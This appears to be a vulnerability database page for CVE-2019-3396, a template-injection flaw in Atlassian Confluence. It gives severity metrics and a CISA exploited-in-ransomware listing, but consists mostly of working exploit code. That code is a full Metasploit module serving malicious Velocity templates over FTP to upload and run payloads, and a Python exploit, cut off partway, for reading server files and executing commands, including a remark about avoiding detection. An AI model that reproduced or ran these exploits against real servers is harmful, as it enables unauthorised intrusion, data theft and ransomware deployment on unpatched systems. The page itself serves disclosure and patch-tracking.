CVE-2019-3396 : Detail

CVE-2019-3396

9.8
/
Critical
Directory Traversal
A01-Broken Access Control
96.94%V3
Network
2019-03-25
18h37 +00:00
2025-02-07
12h25 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

Metrics

Metrics Score Severity CVSS Vector Source
V3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Network

The vulnerable component is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers).

Attack Complexity

This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

None

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.

User Interaction

This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component.

None

The vulnerable system can be exploited without interaction from any user.

Base: Scope Metrics

The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope.

Scope

Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs.

Unchanged

An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority.

Base: Impact Metrics

The Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

High

There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

High

There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability.

Environmental Metrics

These metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.

 [email protected]
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]

CISA KEV (Known Exploited Vulnerabilities)

Vulnerability name : Atlassian Confluence Server and Data Center Server-Side Template Injection Vulnerability

Required action : Apply updates per vendor instructions.

Known To Be Used in Ransomware Campaigns : Known

Added : 2021-11-02 23h00 +00:00

Action is due : 2022-05-02 22h00 +00:00

Important information
This CVE is identified as vulnerable and poses an active threat, according to the Catalog of Known Exploited Vulnerabilities (CISA KEV). The CISA has listed this vulnerability as actively exploited by cybercriminals, emphasizing the importance of taking immediate action to address this flaw. It is imperative to prioritize the update and remediation of this CVE to protect systems against potential cyberattacks.

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 46731

Publication date : 2019-04-18 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::FtpServer def initialize(info={}) super(update_info(info, 'Name' => "Atlassian Confluence Widget Connector Macro Velocity Template Injection", 'Description' => %q{ Widget Connector Macro is part of Atlassian Confluence Server and Data Center that allows embed online videos, slideshows, photostreams and more directly into page. A _template parameter can be used to inject remote Java code into a Velocity template, and gain code execution. Authentication is unrequired to exploit this vulnerability. By default, Java payload will be used because it is cross-platform, but you can also specify which native payload you want (Linux or Windows). Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected. This vulnerability was originally discovered by Daniil Dmitriev https://twitter.com/ddv_ua. }, 'License' => MSF_LICENSE, 'Author' => [ 'Daniil Dmitriev', # Discovering vulnerability 'Dmitry (rrock) Shchannikov' # Metasploit module ], 'References' => [ [ 'CVE', '2019-3396' ], [ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html' ], [ 'URL', 'https://chybeta.github.io/2019/04/06/Analysis-for-【CVE-2019-3396】-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/'], [ 'URL', 'https://paper.seebug.org/886/'] ], 'Targets' => [ [ 'Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }], [ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }], [ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }] ], 'DefaultOptions' => { 'RPORT' => 8090, 'SRVPORT' => 8021, }, 'Privileged' => false, 'DisclosureDate' => 'Mar 25 2019', 'DefaultTarget' => 0, 'Stance' => Msf::Exploit::Stance::Aggressive )) register_options( [ OptString.new('TARGETURI', [true, 'The base to Confluence', '/']), OptString.new('TRIGGERURL', [true, 'Url to external video service to trigger vulnerability', 'https://www.youtube.com/watch?v=dQw4w9WgXcQ']) ]) end # Handles ftp RETP command. # # @param c [Socket] Control connection socket. # @param arg [String] RETR argument. # @return [void] def on_client_command_retr(c, arg) vprint_status("FTP download request for #{arg}") conn = establish_data_connection(c) if(not conn) c.put("425 Can't build data connection\r\n") return end c.put("150 Opening BINARY mode data connection for #{arg}\r\n") case arg when /check\.vm$/ conn.put(wrap(get_check_vm)) when /javaprop\.vm$/ conn.put(wrap(get_javaprop_vm)) when /upload\.vm$/ conn.put(wrap(get_upload_vm)) when /exec\.vm$/ conn.put(wrap(get_exec_vm)) else conn.put(wrap(get_dummy_vm)) end c.put("226 Transfer complete.\r\n") conn.close end # Handles ftp PASS command to suppress output. # # @param c [Socket] Control connection socket. # @param arg [String] PASS argument. # @return [void] def on_client_command_pass(c, arg) @state[c][:pass] = arg vprint_status("#{@state[c][:name]} LOGIN #{@state[c][:user]} / #{@state[c][:pass]}") c.put "230 Login OK\r\n" end # Handles ftp EPSV command to suppress output. # # @param c [Socket] Control connection socket. # @param arg [String] EPSV argument. # @return [void] def on_client_command_epsv(c, arg) vprint_status("#{@state[c][:name]} UNKNOWN 'EPSV #{arg}'") c.put("500 'EPSV #{arg}': command not understood.\r\n") end # Returns a upload template. # # @return [String] def get_upload_vm ( <<~EOF $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}')) EOF ) end # Returns a command execution template. # # @return [String] def get_exec_vm ( <<~EOF $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor() EOF ) end # Returns checking template. # # @return [String] def get_check_vm ( <<~EOF #{@check_text} EOF ) end # Returns Java's getting property template. # # @return [String] def get_javaprop_vm ( <<~EOF $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{@prop}').toString() EOF ) end # Returns dummy template. # # @return [String] def get_dummy_vm ( <<~EOF EOF ) end # Checks the vulnerability. # # @return [Array] Check code def check checkcode = Exploit::CheckCode::Safe begin # Start the FTP service print_status("Starting the FTP server.") start_service @check_text = Rex::Text.rand_text_alpha(5..10) res = inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}check.vm") if res && res.body && res.body.include?(@check_text) checkcode = Exploit::CheckCode::Vulnerable end rescue Msf::Exploit::Failed => e vprint_error(e.message) checkcode = Exploit::CheckCode::Unknown end checkcode end # Injects Java code to the template. # # @param service_url [String] Address of template to injection. # @return [void] def inject_template(service_url, timeout=20) uri = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview') res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'headers' => { 'Accept' => '*/*', 'Origin' => full_uri(vhost_uri: true) }, 'ctype' => 'application/json; charset=UTF-8', 'data' => { 'contentId' => '1', 'macro' => { 'name' => 'widget', 'body' => '', 'params' => { 'url' => datastore['TRIGGERURL'], '_template' => service_url } } }.to_json }, timeout=timeout) unless res unless service_url.include?("exec.vm") print_warning('Connection timed out in #inject_template') end return end if res.body.include? 'widget-error' print_error('Failed to inject and execute code:') else vprint_status("Server response:") end vprint_line(res.body) res end # Returns a system property for Java. # # @param prop [String] Name of the property to retrieve. # @return [String] def get_java_property(prop) @prop = prop res = inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm") if res && res.body return clear_response(res.body) end '' end # Returns the target platform. # # @return [String] def get_target_platform return get_java_property('os.name') end # Checks if the target os/platform is compatible with the module target or not. # # @return [TrueClass] Compatible # @return [FalseClass] Not compatible def target_platform_compat?(target_platform) target.platform.names.each do |n| if n.downcase == 'java' || target_platform.downcase.include?(n.downcase) return true end end false end # Returns a temp path from the remote target. # # @return [String] def get_tmp_path return get_java_property('java.io.tmpdir') end # Returns the Java home path used by Confluence. # # @return [String] def get_java_home_path return get_java_property('java.home') end # Returns Java code that can be used to inject to the template in order to copy a file. # # @note The purpose of this method is to have a file that is not busy, so we can execute it. # It is meant to be used with #get_write_file_code. # # @param fname [String] The file to copy # @param new_fname [String] The new file # @return [void] def get_dup_file_code(fname, new_fname) if fname =~ /^\/[[:print:]]+/ @command = "cp #{fname} #{new_fname}" else @command = "cmd.exe /C copy #{fname} #{new_fname}" end inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm") end # Returns the normalized file path for payload. # # @return [String] def normalize_payload_fname(tmp_path, fname) # A quick way to check platform insteaf of actually grabbing os.name in Java system properties. if /^\/[[:print:]]+/ === tmp_path Rex::FileUtils.normalize_unix_path(tmp_path, fname) else Rex::FileUtils.normalize_win_path(tmp_path, fname) end end # Exploits the target in Java platform. # # @return [void] def exploit_as_java tmp_path = get_tmp_path if tmp_path.blank? fail_with(Failure::Unknown, 'Unable to get the temp path.') end @fname = normalize_payload_fname(tmp_path, "#{Rex::Text.rand_text_alpha(5)}.jar") @b64 = Rex::Text.encode_base64(payload.encoded_jar) @command = '' java_home = get_java_home_path if java_home.blank? fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.') else vprint_status("Found Java home path: #{java_home}") end register_files_for_cleanup(@fname) if /^\/[[:print:]]+/ === @fname normalized_java_path = Rex::FileUtils.normalize_unix_path(java_home, '/bin/java') @command = %Q|#{normalized_java_path} -jar #{@fname}| else normalized_java_path = Rex::FileUtils.normalize_win_path(java_home, '\\bin\\java.exe') @fname.gsub!(/Program Files/, 'PROGRA~1') @command = %Q|cmd.exe /C "#{normalized_java_path}" -jar #{@fname}| end print_status("Attempting to upload #{@fname}") inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm") print_status("Attempting to execute #{@fname}") inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5) end # Exploits the target in Windows platform. # # @return [void] def exploit_as_windows tmp_path = get_tmp_path if tmp_path.blank? fail_with(Failure::Unknown, 'Unable to get the temp path.') end @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform)) @fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe") new_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe") @fname.gsub!(/Program Files/, 'PROGRA~1') new_fname.gsub!(/Program Files/, 'PROGRA~1') register_files_for_cleanup(@fname, new_fname) print_status("Attempting to upload #{@fname}") inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm") print_status("Attempting to copy payload to #{new_fname}") get_dup_file_code(@fname, new_fname) print_status("Attempting to execute #{new_fname}") @command = new_fname inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5) end # Exploits the target in Linux platform. # # @return [void] def exploit_as_linux tmp_path = get_tmp_path if tmp_path.blank? fail_with(Failure::Unknown, 'Unable to get the temp path.') end @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform)) @fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5)) new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6)) register_files_for_cleanup(@fname, new_fname) print_status("Attempting to upload #{@fname}") inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm") @command = "chmod +x #{@fname}" inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm") print_status("Attempting to copy payload to #{new_fname}") get_dup_file_code(@fname, new_fname) print_status("Attempting to execute #{new_fname}") @command = new_fname inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5) end def exploit @wrap_marker = Rex::Text.rand_text_alpha(5..10) # Start the FTP service print_status("Starting the FTP server.") start_service target_platform = get_target_platform if target_platform.nil? fail_with(Failure::Unreachable, 'Target did not respond to OS check. Confirm RHOSTS and RPORT, then run "check".') else print_status("Target being detected as: #{target_platform}") end unless target_platform_compat?(target_platform) fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.') end case target.name.downcase when /java$/ exploit_as_java when /windows$/ exploit_as_windows when /linux$/ exploit_as_linux end end # Wraps request. # # @return [String] def wrap(string) "#{@wrap_marker}\n#{string}#{@wrap_marker}\n" end # Returns unwrapped response. # # @return [String] def clear_response(string) if match = string.match(/#{@wrap_marker}\n(.*)\n#{@wrap_marker}\n/m) return match.captures[0] end end end
Exploit Database EDB-ID : 49465

Publication date : 2021-01-21 23h00 +00:00
Author : 46o60
EDB Verified : No

# Exploit Title: Atlassian Confluence Widget Connector Macro - SSTI # Date: 21-Jan-2021 # Exploit Author: 46o60 # Vendor Homepage: https://www.atlassian.com/software/confluence # Software Link: https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin # Version: 6.12.1 # Tested on: Ubuntu 20.04.1 LTS # CVE : CVE-2019-3396 #!/usr/bin/env python3 # -*- coding: UTF-8 -*- """ Exploit for CVE-2019-3396 (https://www.cvedetails.com/cve/CVE-2019-3396/) Widget Connector macro in Atlassian Confluence Server server-side template injection. Vulnerability information: Authors: Daniil Dmitriev - Discovering vulnerability Dmitry (rrock) Shchannikov - Metasploit module Exploit ExploitDB: https://www.exploit-db.com/exploits/46731 Metasploit https://www.rapid7.com/db/modules/exploit/multi/http/confluence_widget_connector/ exploit/multi/http/confluence_widget_connector While Metasploit module works perfectly fine it has a limitation that to gain RCE outbound FTP request is being made from the target Confluence server towards attacker's server where the Velocity template with the payload is being hosted. If this is not possible, for example, because network where the target Confluence server is located filters all outbound traffic, alternative approach is needed. This exploit, in addition to original exploit implements this alternative approach by first uploading the template to the server and then loading it with original vulnerability from local file system. The limitation is that to upload a file, a valid session is needed for a non-privileged user. Any user can upload a file to the server by attaching the file to his "personal space". There are two modes of the exploit: 1. Exploiting path traversal for file disclosure and directory listings. 2. RCE by uploading a template file with payload to the server. In case where network is filtered and loading remote template is not possible and also you do not have a low-privileged user session, you can still exploit the '_template' parameter to browse the server file system by using the first mode of this exploit. Conveniently, application returns file content as well as directory listing depending on to what path is pointing to. As in original exploit no authentication is needed for this mode. Limitations of path traversal exploit: - not possible to distinguish between non-existent path and lack of permissions - no distinction between files and directories in the output If you have ability to authenticate to the server and have enough privileges to upload files use the second mode. A regular user probably has enough privileges for this since each user can have their own personal space where they should be able to add attachments. This exploit automatically finds the personal space, or creates one if it does not exists, a file with Velocity template payload. It then uses the original vulnerability but loads the template file with payload from local filesystem instead from remote system. Prerequisite of RCE in this exploit: - authenticated session is needed - knowledge of where attached files are stored on the file system - if it is not default location then use first mode to find it, should be in Confluence install directory under ./attachments subdirectory Usage - list /etc folder on Confluence server hosted on http://confluence.example.com python exploit.py -th confluence.example.com fs /etc - get content of /etc/passwd on same server but through a proxy python exploit.py -th confluence.example.com -px http://127.0.0.1:8080 fs /etc/passwd - execute 'whoami' command on the same server (this will upload a template file with payload to the server using existing session) python exploit.py -th confluence.example.com rce -c JSESSIONID=ABCDEF123456789ABCDEF123456789AB "whoami" Tested on Confluence versions: 6.12.1 To test the exploit: 1. Download Confluence trial version for version 6.12.1 https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin (to find this URL go to download page for the latest version, pick LTS release Linux 64 Bit, turn on the browser network tools to capture HTTP traffic, click Submit, take the URL from request towards 'product-downloads' and change the version in URL to be 6.12.1) SHA256: 679b1c05cf585b92af9888099c4a312edb2c4f9f4399cf1c1b716b03c114e9e6 atlassian-confluence-6.12.1-x64.bin 2. Run the binary to install it, for example on Ubuntu 20.04. Use "Express Install" and everything by default. chmod +x atlassian-confluence-6.12.1-x64.bin sudo ./atlassian-confluence-6.12.1-x64.bin 3. Open the browser to configure initial installation, when you get to license window copy the server ID. 4. Create account at https://my.atlassian.com/ and request for new trial license using server ID. 5. Activate the license and finish the installation with default options. 6. Create a user and login with him to go through initial user setup and get the session id for RCE part of the exploit. 7. Run the exploit (see usage above). """ __version__ = "1.0.0" __author__ = "46o60" import argparse import logging import requests import urllib3 from bs4 import BeautifulSoup import re import json import random import string # script and banner SCRIPT_NAME = "CVE-2019-3396: Confluence exploit script" ASCII_BANNER_TEXT = """____ ____ _ _ ____ _ _ _ ____ _ _ ____ ____ ____ | | | |\ | |___ | | | |___ |\ | | | | |__/ |___ |__| | \| | |___ |__| |___ | \| |___ |__| | \ """ # turn off requests log output urllib3.disable_warnings() logging.getLogger("urllib3").setLevel(logging.WARNING) def print_banner(): """ Prints script ASCII banner and basic information. Because it is cool. """ print(ASCII_BANNER_TEXT) print("{} v{}".format(SCRIPT_NAME, __version__)) print("Author: {}".format(__author__)) print() def exit_log(logger, message): """ Utility function to log exit message and finish the script. """ logger.error(message) exit(1) def check_cookie_format(value): """ Checks if value is in format: ^[^=]+=[^=]+$ """ pattern = r"^[^=]+=[^=]+$" if not re.match(pattern, value): raise argparse.ArgumentTypeError("provided cookie string does not have correct format") return value def parse_arguments(): """ Performs parsing of script arguments. """ # creating parser parser = argparse.ArgumentParser( prog=SCRIPT_NAME, description="Exploit CVE-2019-3396 to explore file system or gain RCE through file upload." ) # general script arguments parser.add_argument( "-V", "--version", help="displays the current version of the script", action="version", version="{name} {version}".format(name=SCRIPT_NAME, version=__version__) ) parser.add_argument( "-v", "--verbosity", help="increase output verbosity, two possible levels, no verbosity with default log output and debug verbosity", action="count", default=0 ) parser.add_argument( "-sb", "--skip-banner", help="skips printing of the banner", action="store_true", default=False ) parser.add_argument( "-s", "--silent", help="do not output results of the exploit to standard output", action="store_true", default=False ) parser.add_argument( "-q", "--quiet", help="do not output any logs", action="store_true", default=False ) # arguments for input parser.add_argument( "-px", "--proxy", help="proxy that should be used for the request, the same proxy will be used for HTTP and HTTPS" ) parser.add_argument( "-t", "--tls", help="use HTTPS protocol, default behaviour is to use plain HTTP", action="store_true" ) parser.add_argument( "-th", "--target-host", help="target hostname/domain", required=True ) parser.add_argument( "-p", "--port", help="port where the target is listening, default ports 80 for HTTP and 443 for HTTPS" ) # two different sub commands subparsers = parser.add_subparsers( title="actions", description="different behaviours of the script", help="for detail description of available action options invoke -h for each individual action", dest="action" ) # only exploring file system by disclosure of files and directories parser_file_system = subparsers.add_parser( "fs", help="use the exploit to browse local file system on the target endpoint" ) parser_file_system.add_argument( "path", help="target path that should be retrieved from the vulnerable server, can be path to a file or to a directory" ) parser_file_system.set_defaults(func=exploit_path_traversal) # using file upload to deploy payload and achieve RCE parser_rce = subparsers.add_parser( "rce", help="use the exploit to upload a template " ) parser_rce.add_argument( "-hd", "--home-directory", help="Confluence home directory on the server" ) parser_rce.add_argument( "-c", "--cookie", help="cookie that should be used for the session, value passed as it is in HTTP request, for example: " "-c JSESSIONID=ABCDEF123456789ABCDEF123456789AB", type=check_cookie_format, required=True ) parser_rce.add_argument( "command", help="target path that should be retrieved from the vulnerable server, can be path to a file or to a directory" ) parser_rce.set_defaults(func=exploit_rce) # parsing arguments = parser.parse_args() return arguments class Configuration: """ Represents all supported configuration items. """ # Parse arguments and set all configuration variables def __init__(self, script_args): self.script_arguments = script_args # setting input arguments self._proxy = self.script_arguments.proxy self._target_protocol = "https" if self.script_arguments.tls else "http" self._target_host = self.script_arguments.target_host self._target_port = self.script_arguments.port if self.script_arguments.port else \ 443 if self.script_arguments.tls else 80 @staticmethod def get_logger(verbosity): """ Prepares logger to output to stdout with appropriate verbosity. """ logger = logging.getLogger() # default logging level logger.setLevel(logging.DEBUG) # Definition of logging to console ch = logging.StreamHandler() # specific logging level for console if verbosity == 0: ch.setLevel(logging.INFO) elif verbosity > 0: ch.setLevel(logging.DEBUG) # formatting class MyFormatter(logging.Formatter): default_fmt = logging.Formatter('[?] %(message)s') info_fmt = logging.Formatter('[+] %(message)s') error_fmt = logging.Formatter('[-] %(message)s') warning_fmt = logging.Formatter('[!] %(message)s') debug_fmt = logging.Formatter('>>> %(message)s') def format(self, record): if record.levelno == logging.INFO: return self.info_fmt.format(record) elif record.levelno == logging.ERROR: return self.error_fmt.format(record) elif record.levelno == logging.WARNING: return self.warning_fmt.format(record) elif record.levelno == logging.DEBUG: return self.debug_fmt.format(record) else: return self.default_fmt.format(record) ch.setFormatter(MyFormatter()) # adding handler logger.addHandler(ch) return logger # Properties @property def endpoint(self): if not self._target_protocol or not self._target_host or not self._target_port: exit_log(log, "failed to generate endpoint URL") return f"{self._target_protocol}://{self._target_host}:{self._target_port}" @property def remote_path(self): return self.script_arguments.path @property def attachment_dir(self): home_dir = self.script_arguments.home_directory if self.script_arguments.home_directory else \ Exploit.DEFAULT_CONFLUENCE_INSTALL_DIR return f"{home_dir}{Exploit.DEFAULT_CONFLUENCE_ATTACHMENT_PATH}" @property def rce_command(self): return self.script_arguments.command @property def session_cookie(self): if not self.script_arguments.cookie: return None parts = self.script_arguments.cookie.split("=") return { parts[0]: parts[1] } @property def proxies(self): return { "http": self._proxy, "https": self._proxy } class Exploit: """ This class represents actual exploit towards the target Confluence server. """ # used for both path traversal and RCE DEFAULT_VULNERABLE_ENDPOINT = "/rest/tinymce/1/macro/preview" # used only for RCE CREATE_PERSONAL_SPACE_PATH = "/rest/create-dialog/1.0/space-blueprint/create-personal-space" PERSONAL_SPACE_KEY_PATH = "/index.action" PERSONAL_SPACE_KEY_REGEX = r"^/spaces/viewspace\.action\?key=(.*?)$" PERSONAL_SPACE_ID_PATH = "/rest/api/space" PERSONAL_SPACE_KEY_PARAMETER_NAME = "spaceKey" HOMEPAGE_REGEX = r"/rest/api/content/([0-9]+)$" ATL_TOKEN_PATH = "/pages/viewpageattachments.action" FILE_UPLOAD_PATH = "/pages/doattachfile.action" # file name has no real significance, file is identified on file system by it's ID # (change only if you want to avoid detection) DEFAULT_UPLOADED_FILE_NAME = "payload_{}.vm".format( ''.join(random.choice(string.ascii_lowercase) for i in range(5)) ) # the extension .vm is not really needed, remove it if you have problems uploading the template DEFAULT_CONFLUENCE_INSTALL_DIR = "/var/atlassian/application-data/confluence" DEFAULT_CONFLUENCE_ATTACHMENT_PATH = "/attachments/ver003" # using random name for uploaded file so it will always be first version of the file DEFAULT_FILE_VERSION = "1" def __init__(self, config): """ Runs the exploit towards target_url. """ self._config = config self._target_url = f"{self._config.endpoint}{Exploit.DEFAULT_VULNERABLE_ENDPOINT}" if self._config.script_arguments.action == "rce": self._root_url = f"{self._config.endpoint}/" self._create_personal_space_url = f"{self._config.endpoint}{Exploit.CREATE_PERSONAL_SPACE_PATH}" self._personal_space_key_url = f"{self._config.endpoint}{Exploit.PERSONAL_SPACE_KEY_PATH}" # Following data will be dynamically created while exploit is running self._space_key = None self._personal_space_id_url = None self._space_id = None self._homepage_id = None self._atl_token_url = None self._atl_token = None self._upload_url = None self._file_id = None def generate_payload_location(self): """ Generates location on file system for uploaded attachment based on Confluence Ver003 scheme. See more here: https://confluence.atlassian.com/doc/hierarchical-file-system-attachment-storage-704578486.html """ if not self._space_id or not self._homepage_id or not self._file_id: exit_log(log, "cannot generate payload location without space, homepage and file ID") space_folder_one = str(int(self._space_id[-3:]) % 250) space_folder_two = str(int(self._space_id[-6:-3]) % 250) space_folder_three = self._space_id page_folder_one = str(int(self._homepage_id[-3:]) % 250) page_folder_two = str(int(self._homepage_id[-6:-3]) % 250) page_folder_three = self._homepage_id file_folder = self._file_id version = Exploit.DEFAULT_FILE_VERSION payload_location = f"{self._config.attachment_dir}/" \ f"{space_folder_one}/{space_folder_two}/{space_folder_three}/"\ f"{page_folder_one}/{page_folder_two}/{page_folder_three}/" \ f"{file_folder}/{version}" log.debug(f"generated payload location: {payload_location}") return payload_location def path_traversal(self, target_remote_path, decode_output=False): """ Uses vulnerability in _template parameter to achieve path traversal. Args: target_remote_path (string): path on local file system of the target application decode_output (bool): set to True if output of the file will be character codes separated by new lines, used with RCE """ post_data = { "contentId": str(random.randint(1, 10000)), "macro": { "body": "", "name": "widget", "params": { "_template": f"file://{target_remote_path}", "url": "https://www.youtube.com/watch?v=" + ''.join(random.choice( string.ascii_lowercase + string.ascii_uppercase + string.digits) for i in range(11)) } } } log.info("sending request towards vulnerable endpoint with payload in '_template' parameter") response = requests.post( self._target_url, headers={ "Content-Type": "application/json; charset=utf-8" }, json=post_data, proxies=self._config.proxies, verify=False, allow_redirects=False ) # check if response was proper... if not response.status_code == 200: log.debug(f"response code: {response.status_code}") exit_log(log, "exploit failed") page_content = response.content # response is HTML soup = BeautifulSoup(page_content, features="html.parser") # if div element with class widget-error is returned, that means the exploit worked but it failed to retrieve # the requested path error_element = soup.find_all("div", "widget-error") if error_element: log.warning("failed to retrieve target path on the system") log.warning("target path does not exist or application does not have appropriate permissions to view it") return "" else: # otherwise parse out the actual response (file content or directory listing) output_element = soup.find_all("div", "wiki-content") if not output_element: exit_log(log, "application did not return appropriate HTML element") if not len(output_element) == 1: log.warning("application unexpectedly returned multiple HTML elements, using the first one") output_element = output_element[0] log.debug("extracting HTML element value and stripping the leading and trailing spaces") # output = output_element.string.strip() output = output_element.decode_contents().strip() if "The macro 'widget' is unknown. It may have been removed from the system." in output: exit_log(log, "widget seems to be disabled on system, target most likely is not vulnerable") if not self._config.script_arguments.silent: if decode_output: parsed_output = "" p = re.compile(r"^([0-9]+)") for line in output.split("\n"): r = p.match(line) if r: parsed_output += chr(int(r.group(1))) print(parsed_output.strip()) else: print(output) return output def find_personal_space_key(self): """ Makes request that will return personal space key in the response. """ log.debug("checking if user has personal space") response = requests.get( self._root_url, cookies=self._config.session_cookie, proxies=self._config.proxies, verify=False, ) page_content = response.text if "Add personal space" in page_content: log.info(f"user does not have 